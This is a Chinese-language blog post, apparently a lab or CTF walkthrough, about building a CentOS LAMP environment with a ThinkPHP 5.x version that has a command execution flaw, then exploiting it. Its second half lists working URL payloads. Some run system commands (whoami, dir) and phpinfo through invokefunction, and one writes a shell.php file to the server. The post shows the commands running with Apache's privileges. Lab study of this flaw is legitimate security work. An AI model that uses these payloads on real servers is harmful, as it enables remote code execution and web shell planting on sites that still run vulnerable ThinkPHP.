楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了
一.thinkphp5.X系列
1.安装composer
yum -y install composer
安装php拓展
yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -y
2.切换目录到/var/www/html
cd /var/www/html
安装thinkphp5
博主把含有命令执行漏洞的thinkphp源码链接附上
把文件解压到当前目录(/var/www/html)即可
3.浏览器查看是否安装成功
到这里环境就搭建好了(各位看官如果照着前面的步骤没有成功的,麻烦把php运行环境搭建起来)
4.参考官方poc直接执行payload
#payload
http://192.168.2.134/tp5/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
/thinkphp/public/?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1
/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars=dir
/thinkphp/public/?s=index/\think\app/invokefunction&function=system&return_value=&command=dir
/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars[0]=dir&vars[1][]=
/thinkphp/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
可以看到,这里权限是Apache
这里说下,头一天强网杯web有一题就是thinkphp5.x的命令执行漏洞,叫做强网先锋上单。。。
当时觉得还好,随便拉的几个队友,有人做出来了&#